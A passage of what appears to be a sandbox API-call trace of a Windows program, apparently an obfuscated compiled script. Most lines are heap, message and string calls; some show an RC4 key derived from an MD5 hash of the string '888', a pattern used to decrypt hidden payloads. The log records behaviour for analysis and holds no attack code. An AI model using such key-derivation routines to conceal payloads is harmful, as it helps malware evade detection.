lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.505] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.505] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.505] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.505] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.505] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.505] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0149.505] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.506] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.506] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.506] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.506] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.506] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0149.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0149.506] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.506] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.506] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.506] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.506] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.506] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.506] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0149.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0149.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0149.507] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf088) returned 1 [0149.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.508] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.508] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.508] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0149.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0149.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.509] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.509] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.509] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.509] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.509] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.509] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.509] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.509] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.509] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.509] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.509] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.509] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.509] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.510] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.510] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.510] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.510] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa510, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0149.510] CryptCreateHash (in: hProv=0x9bf088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0149.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.510] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.511] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0149.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.511] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.511] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.511] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.511] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.511] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0149.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa318, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0149.511] CryptHashData (hHash=0x9e2138, pbData=0x2a71ba8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0149.511] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.513] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.513] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.513] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.513] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.513] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.513] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.513] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.513] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.513] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.513] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa4b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0149.514] CryptDeriveKey (in: hProv=0x9bf088, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1b38) returned 1 [0149.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.514] 